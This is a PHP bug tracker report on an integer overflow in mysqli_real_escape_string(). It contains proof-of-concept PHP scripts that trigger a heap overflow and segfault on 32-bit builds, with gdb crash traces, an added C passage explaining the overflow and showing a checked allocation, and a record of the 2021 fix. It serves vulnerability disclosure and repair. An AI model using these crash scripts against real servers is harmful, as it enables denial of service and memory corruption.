Bug #74544 Integer overflow in mysqli_real_escape_string()
Submitted: 2017-05-05 04:31 UTC Modified: 2021-08-09 10:49 UTC
Votes: 3
Avg. Score: 3.7 ± 1.9
Reproduced: 1 of 2 (50.0%)
Same Version: 1 (100.0%)
Same OS: 1 (100.0%)
From: whitehat002 at hotmail dot com Assigned: cmb (profile)
Status: Closed Package: MySQLi related
PHP Version: 7.1.5 OS:
Private report: No CVE-ID: None
 [2017-05-05 04:31 UTC] whitehat002 at hotmail dot com
Description:
------------
PHP_FUNCTION(mysqli_real_escape_string) {
	MY_MYSQL	*mysql;
	zval		*mysql_link = NULL;
	char		*escapestr;
	size_t			escapestr_len;
	zend_string *newstr;

	if (zend_parse_method_parameters(ZEND_NUM_ARGS(), getThis(), "Os", &mysql_link, mysqli_link_class_entry, &escapestr, &escapestr_len) == FAILURE) {
		return;
	}
	MYSQLI_FETCH_RESOURCE_CONN(mysql, mysql_link, MYSQLI_STATUS_VALID);

	newstr = zend_string_alloc(2 * escapestr_len, 0);  //integer overflow
	ZSTR_LEN(newstr) = mysql_real_escape_string(mysql->mysql, ZSTR_VAL(newstr), escapestr, escapestr_len);
	newstr = zend_string_truncate(newstr, ZSTR_LEN(newstr), 0);

	RETURN_NEW_STR(newstr);
}

Test script:
---------------
<?php
ini_set("memory_limit",-1);
$str=str_repeat("A",0x7fffffff);
$str.="AAAAA";
$mysqli=new mysqli("localhost","root","toor","mysql");
$mysqli->real_escape_string($str);
?>


Actual result:
--------------
root@hackyzh-virtual-machine:~# gdb -q --args ./php-7.1.4/sapi/cli/php -n poc2.php
Reading symbols from /root/php-7.1.4/sapi/cli/php...done.
(gdb) b mysqli_api.c:1968
Breakpoint 1 at 0x81ddbdc: file /root/php-7.1.4/ext/mysqli/mysqli_api.c, line 1968.
(gdb) r
Starting program: /root/php-7.1.4/sapi/cli/php -n poc2.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Breakpoint 1, zif_mysqli_real_escape_string (execute_data=0xb70130f0, 
    return_value=0xbfffc100) at /root/php-7.1.4/ext/mysqli/mysqli_api.c:1968
1968		newstr = zend_string_alloc(2 * escapestr_len, 0);
(gdb) p/x escapestr_len
$1 = 0x80000004
(gdb) p/x 2*escapestr_len
$2 = 0x8


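The gdb session above shows the mechanism: on a 32-bit build size_t is four bytes, so 2 * 0x80000004 wraps to 8 and zend_string_alloc() hands back an 8-byte buffer for a string that mysql_real_escape_string() may expand to almost 4 GiB. The following is an added example, not php-src code and not the fix from PR 7353: it models the 32-bit size_t with uint32_t so the arithmetic is the same on any host, puts the unchecked computation next to an overflow-checked one, and uses a hypothetical alloc_escape_buffer() wrapper (a stand-in for the zend_string_alloc() call site) that refuses the request instead of returning the undersized buffer.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Model the 32-bit build from the report: size_t is 4 bytes there, so a fixed
 * 32-bit type reproduces the same arithmetic on any host (assumption: the
 * report's gdb output comes from an i386 build, as the libc path indicates). */
typedef uint32_t size32_t;

/* The unchecked computation from the bug report: on a 32-bit size_t the
 * product wraps modulo 2^32, so 0x80000004 * 2 becomes 8. */
size32_t unchecked_escape_buf_len(size32_t escapestr_len)
{
    return 2 * escapestr_len;
}

/* True when doubling the length cannot be represented in a 32-bit size_t. */
bool doubling_overflows(size32_t escapestr_len)
{
    return escapestr_len > UINT32_MAX / 2;
}

/* Overflow-checked size computation: stores 2 * len in *out and returns true,
 * or returns false without touching *out when the product would wrap. */
bool checked_escape_buf_len(size32_t escapestr_len, size32_t *out)
{
    if (doubling_overflows(escapestr_len)) {
        return false;
    }
    *out = 2 * escapestr_len;
    return true;
}

/* Hypothetical allocation wrapper standing in for the zend_string_alloc()
 * call site (not php-src code): it refuses the request instead of returning a
 * buffer far smaller than what the escaper will write into it. The caller
 * frees the result. */
char *alloc_escape_buffer(size32_t escapestr_len)
{
    size32_t n;
    if (!checked_escape_buf_len(escapestr_len, &n)) {
        return NULL;
    }
    return malloc((size_t)n + 1); /* +1 for the terminating NUL */
}

int main(void)
{
    /* Length observed in the gdb session on the report. */
    size32_t len = 0x80000004u;
    size32_t n;

    printf("unchecked: 2 * 0x%08x = 0x%08x\n",
           (unsigned)len, (unsigned)unchecked_escape_buf_len(len));
    if (checked_escape_buf_len(len, &n)) {
        printf("checked:   0x%08x\n", (unsigned)n);
    } else {
        printf("checked:   refused, 2 * 0x%08x overflows a 32-bit size_t\n",
               (unsigned)len);
    }

    char *buf = alloc_escape_buffer(16);
    printf("alloc(16): %s\n", buf ? "ok" : "failed");
    free(buf);
    return 0;
}
```

On a real build the same check is written against SIZE_MAX / 2 (or with __builtin_mul_overflow where available) so that it is correct for both 32-bit and 64-bit size_t; the point is that the bound check must happen before the multiplication, because once the product has wrapped nothing downstream can tell that the buffer is too small.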
Patches

bug74544.diff (last revision 2017-07-24 10:11 UTC by johannes at schlueters dot de)

History

 [2017-05-09 08:17 UTC] whitehat002 at hotmail dot com
In php-7.0.1, I take this script to test. Then, it crashes. In others, it does not. I do not know why the same code will have different results.
_____________________________________________________________________

<?php
ini_set("memory_limit",-1);
$str=str_repeat("A",0x7ffffff0);
$mysqli=new mysqli("localhost","root","toor","mysql");
$mysqli->real_escape_string($str);
?>
_____________________________________________________________________

hackyzh@ubuntu:~/Downloads$ gdb -q --args ./php-7.0.1/sapi/cli/php -n ../Desktop/poc.php
Reading symbols from /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php...done.
(gdb) r
Starting program: /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php -n ../Desktop/poc.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Warning: String is not zero-terminated (@��) (source: /home/hackyzh/Downloads/php-7.0.1/Zend/zend_vm_execute.h:858) in /home/hackyzh/Desktop/poc.php on line 6
[Tue May  9 16:11:53 2017]  Script:  '/home/hackyzh/Desktop/poc.php'

Program received signal SIGSEGV, Segmentation fault.
0x08474ed6 in format_converter (odp=0xbfffc974, 
    fmt=0x8b365a5 "s(%d) : Actual location (location was relayed)\n", 
    ap=0xbfffc9e0 "") at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:993
993							s_len = strlen(s);
(gdb) bt
#0  0x08474ed6 in format_converter (odp=0xbfffc974, 
    fmt=0x8b365a5 "s(%d) : Actual location (location was relayed)\n", 
    ap=0xbfffc9e0 "") at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:993
#1  0x08475719 in strx_printv (ccp=0xbfffc9b8, 
    buf=0xbfffda4c "Tue May  9 16:11:53 2017", len=512, 
    format=0x8b365a4 "%s(%d) : Actual location (location was relayed)\n", 
    ap=0xbfffc9dc "\377\377\377\377")
    at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:1248
#2  0x08475817 in ap_php_snprintf (buf=0xbfffda4c "Tue May  9 16:11:53 2017", 
    len=512, 
    format=0x8b365a4 "%s(%d) : Actual location (location was relayed)\n")
    at /home/hackyzh/Downloads/php-7.0.1/main/snprintf.c:1293
#3  0x08471625 in php_message_handler_for_zend (message=4, data=0xbfffdcbc)
    at /home/hackyzh/Downloads/php-7.0.1/main/main.c:1435
#4  0x084eca9e in zend_message_dispatcher (message=4, data=0xbfffdcbc)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend.c:999
#5  0x084c1af9 in zend_mm_check_leaks (heap=0xb7000040)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend_alloc.c:2121
#6  0x084c1d99 in zend_mm_shutdown (heap=0xb7000040, full=0, silent=0)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend_alloc.c:2193
#7  0x084c2acf in shutdown_memory_manager (silent=0, full_shutdown=0)
    at /home/hackyzh/Downloads/php-7.0.1/Zend/zend_alloc.c:2629
#8  0x0847204d in php_request_shutdown (dummy=0x0)
---Type <return> to continue, or q <return> to quit---
    at /home/hackyzh/Downloads/php-7.0.1/main/main.c:1833
#9  0x08598c13 in do_cli (argc=3, argv=0x8c1cd30)
    at /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php_cli.c:1142
#10 0x0859942a in main (argc=3, argv=0x8c1cd30)
    at /home/hackyzh/Downloads/php-7.0.1/sapi/cli/php_cli.c:1345
 [2017-05-11 09:17 UTC] whitehat002 at hotmail dot com
I found a way to make it crash. It seems to be able to execute remote code.
<?php
ini_set("memory_limit",-1);
$str=str_repeat("A",0x7fffffff);
$str.="AA";
$mysqli=new mysqli("localhost","root","toor","mysql");
$v=$mysqli->real_escape_string($str); 
$mysqli->query($v);           
?>
_______________________________________________________
Program received signal SIGSEGV, Segmentation fault.
0xb7a63976 in ?? () from /lib/i386-linux-gnu/libc.so.6
(gdb) bt
#0  0xb7a63976 in ?? () from /lib/i386-linux-gnu/libc.so.6
#1  0x08349eaf in php_mysqlnd_cmd_write (_packet=0xb7068038)
    at /usr/include/i386-linux-gnu/bits/string3.h:52
#2  0x08349a4b in mysqlnd_mysqlnd_protocol_send_command_pub (
    payload_decoder_factory=0xb706f000, command=COM_QUERY, arg=0xb7002080 "\220 ", 
    arg_len=4294967295, silent=0 '\000', connection_state=0xb706663c, 
    error_info=0xb7066424, upsert_status=0xb70663fc, stats=0xb7002050, 
    send_close=0x83422a0 <mysqlnd_mysqlnd_conn_data_send_close_pub>, 
    send_close_ctx=0xb7066380)
    at /root/php-7.1.4/ext/mysqlnd/mysqlnd_wireprotocol.c:2772
#3  0x08358e6c in mysqlnd_com_query_run (cmd=0xb70543d8)
    at /root/php-7.1.4/ext/mysqlnd/mysqlnd_commands.c:644
#4  0x08342040 in mysqlnd_mysqlnd_conn_data_send_query_pub (conn=0xb7066380, 
    query=0xb7002080 "\220 ", query_len=4294967295, type=MYSQLND_SEND_QUERY_IMPLICIT, 
    read_cb=0x0, err_cb=0x0) at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:889
#5  0x08344a04 in mysqlnd_mysqlnd_conn_data_query_pub (query_len=4294967295, 
    query=0xb7002080 "\220 ", conn=0xb7066380)
    at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:858
#6  mysqlnd_mysqlnd_conn_data_query_pub (conn=0xb7066380, query=0xb7002080 "\220 ", 
    query_len=4294967295) at /root/php-7.1.4/ext/mysqlnd/mysqlnd_connection.c:850
#7  0x081e391a in zif_mysqli_query (execute_data=0xb7013120, return_value=0xbfffc100)
    at /root/php-7.1.4/ext/mysqli/mysqli_nonapi.c:593
#8  0x084558e3 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (execute_data=0xb7013020)
---Type <return> to continue, or q <return> to quit---
    at /root/php-7.1.4/Zend/zend_vm_execute.h:970
#9  0x084093be in execute_ex (ex=0xb7013020)
    at /root/php-7.1.4/Zend/zend_vm_execute.h:432
#10 0x0845770f in zend_execute (op_array=0xb7069180, return_value=0x0)
    at /root/php-7.1.4/Zend/zend_vm_execute.h:474
#11 0x083c15c0 in zend_execute_scripts (type=8, retval=0x0, file_count=3)
    at /root/php-7.1.4/Zend/zend.c:1476
#12 0x08362a0d in php_execute_script (primary_file=0xbfffe464)
    at /root/php-7.1.4/main/main.c:2537
#13 0x08459824 in do_cli (argc=3, argv=0x8a8d868)
    at /root/php-7.1.4/sapi/cli/php_cli.c:993
#14 0x080785ad in main (argc=3, argv=0x8a8d868)
    at /root/php-7.1.4/sapi/cli/php_cli.c:1381
 [2017-05-12 02:08 UTC] whitehat002 at hotmail dot com
-PHP Version: 7.1.4 +PHP Version: 7.1.5
 [2017-05-12 02:08 UTC] whitehat002 at hotmail dot com
In the new PHP version, it also has the same bug.
 [2017-05-15 09:44 UTC] whitehat002 at hotmail dot com
Has anyone solved it?
 [2017-05-17 08:14 UTC] whitehat002 at hotmail dot com
gdb-peda$ r
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
EAX: 0xb719409b --> 0x0 
EBX: 0xb7ab0000 --> 0x1abda8 
ECX: 0xffe6df64 
EDX: 0xb71fffa0 --> 0x0 
ESI: 0xb7002050 --> 0xb7061600 --> 0x5e ('^')
EDI: 0xb70600f0 --> 0xb706e000 --> 0x2000000 
EBP: 0x57f7 
ESP: 0xbfffbef8 --> 0xffffffff 
EIP: 0xb7a3a666 (<__memcpy_ssse3_rep+3510>:	movntdq XMMWORD PTR [edx+0x60],xmm6)
EFLAGS: 0x210282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0xb7a3a657 <__memcpy_ssse3_rep+3495>:	movntdq XMMWORD PTR [edx+0x30],xmm3
   0xb7a3a65c <__memcpy_ssse3_rep+3500>:	movntdq XMMWORD PTR [edx+0x40],xmm4
   0xb7a3a661 <__memcpy_ssse3_rep+3505>:	movntdq XMMWORD PTR [edx+0x50],xmm5
=> 0xb7a3a666 <__memcpy_ssse3_rep+3510>:	movntdq XMMWORD PTR [edx+0x60],xmm6
   0xb7a3a66b <__memcpy_ssse3_rep+3515>:	movntdq XMMWORD PTR [edx+0x70],xmm7
   0xb7a3a670 <__memcpy_ssse3_rep+3520>:	lea    edx,[edx+0x80]
   0xb7a3a676 <__memcpy_ssse3_rep+3526>:	
    jae    0xb7a3a605 <__memcpy_ssse3_rep+3413>
   0xb7a3a678 <__memcpy_ssse3_rep+3528>:	add    ecx,0x80
[------------------------------------stack-------------------------------------]
0000| 0xbfffbef8 --> 0xffffffff 
0004| 0xbfffbefc --> 0x834a14f (<php_mysqlnd_cmd_write+543>:	mov    edx,DWORD PTR [esp+0x2c])
0008| 0xbfffbf00 --> 0xb706e005 --> 0xb7002090 --> 0xb70020a0 --> 0xb70020b0 --> 0xb70020c0 (--> ...)
0012| 0xbfffbf04 --> 0xb7002080 --> 0xb7002090 --> 0xb70020a0 --> 0xb70020b0 --> 0xb70020c0 (--> ...)
0016| 0xbfffbf08 --> 0xffffffff 
0020| 0xbfffbf0c --> 0x8348267 (<_mysqlnd_pecalloc+151>:	jmp    0x8348211 <_mysqlnd_pecalloc+65>)
0024| 0xbfffbf10 --> 0x4 
0028| 0xbfffbf14 --> 0xb7054478 ("toor")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
__memcpy_ssse3_rep () at ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S:1300
1300	../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S: No such file or directory.
gdb-peda$ bt
#0  __memcpy_ssse3_rep () at ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S:1300
#1  0x0834a14f in php_mysqlnd_cmd_write (_packet=0xb7068038)
    at /usr/include/i386-linux-gnu/bits/string3.h:52
#2  0x08349ceb in mysqlnd_mysqlnd_protocol_send_command_pub (
    payload_decoder_factory=0xb706f000, command=COM_QUERY, arg=0xb7002080 "\220 ", 
    arg_len=0xffffffff, silent=0x0, connection_state=0xb706663c, 
    error_info=0xb7066424, upsert_status=0xb70663fc, stats=0xb7002050, 
    send_close=0x8342540 <mysqlnd_mysqlnd_conn_data_send_close_pub>, 
    send_close_ctx=0xb7066380)
    at /root/php-7.1.5/ext/mysqlnd/mysqlnd_wireprotocol.c:2772
#3  0x0835910c in mysqlnd_com_query_run (cmd=0xb70544b0)
    at /root/php-7.1.5/ext/mysqlnd/mysqlnd_commands.c:644
#4  0x083422e0 in mysqlnd_mysqlnd_conn_data_send_query_pub (conn=0xb7066380, 
    query=0xb7002080 "\220 ", query_len=0xffffffff, type=MYSQLND_SEND_QUERY_IMPLICIT, 
    read_cb=0x0, err_cb=0x0) at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:889
#5  0x08344ca4 in mysqlnd_mysqlnd_conn_data_query_pub (query_len=0xffffffff, 
    query=0xb7002080 "\220 ", conn=0xb7066380)
    at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:858
#6  mysqlnd_mysqlnd_conn_data_query_pub (conn=0xb7066380, query=0xb7002080 "\220 ", 
    query_len=0xffffffff) at /root/php-7.1.5/ext/mysqlnd/mysqlnd_connection.c:850
#7  0x081e3b1a in zif_mysqli_query (execute_data=0xb7013120, return_value=0xbfffc100)
    at /root/php-7.1.5/ext/mysqli/mysqli_nonapi.c:593
#8  0x08455c93 in ZEND_DO_FCALL_SPEC_RETVAL_UNUSED_HANDLER (execute_data=0xb7013020)
    at /root/php-7.1.5/Zend/zend_vm_execute.h:970
#9  0x0840969e in execute_ex (ex=0xb7013020)
    at /root/php-7.1.5/Zend/zend_vm_execute.h:432
#10 0x08457abf in zend_execute (op_array=0xb7069180, return_value=0x0)
    at /root/php-7.1.5/Zend/zend_vm_execute.h:474
#11 0x083c1890 in zend_execute_scripts (type=0x8, retval=0x0, file_count=0x3)
    at /root/php-7.1.5/Zend/zend.c:1476
#12 0x08362cad in php_execute_script (primary_file=0xbfffe464)
    at /root/php-7.1.5/main/main.c:2537
#13 0x08459bd4 in do_cli (argc=0x3, argv=0x8a8e868)
    at /root/php-7.1.5/sapi/cli/php_cli.c:993
#14 0x080785ad in main (argc=0x3, argv=0x8a8e868)
    at /root/php-7.1.5/sapi/cli/php_cli.c:1381
#15 0xb791daf3 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
#16 0x08078641 in _start ()
——————————————————————————————————————————————————————
It seems to lead to a buffer overflow.
 [2017-06-20 06:21 UTC] stas@php.net
-Type: Security +Type: Bug
 [2021-08-09 10:49 UTC] cmb@php.net
-Status: Open +Status: Verified -Assigned To: +Assigned To: cmb
 [2021-08-09 10:50 UTC] cmb@php.net
The following pull request has been associated:

Patch Name: Fix #74544: Integer overflow in mysqli_real_escape_string()
On GitHub:  https://github.com/php/php-src/pull/7353
Patch:      https://github.com/php/php-src/pull/7353.patch
 [2021-08-09 22:09 UTC] git@php.net
Automatic comment on behalf of cmb69
Revision: https://github.com/php/php-src/commit/5977610de1aa87630e40a299a2d90fb7cd00bf7c
Log: Fix #74544: Integer overflow in mysqli_real_escape_string()
 [2021-08-09 22:09 UTC] git@php.net
-Status: Verified +Status: Closed
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Wed Sep 18 04:01:27 2024 UTC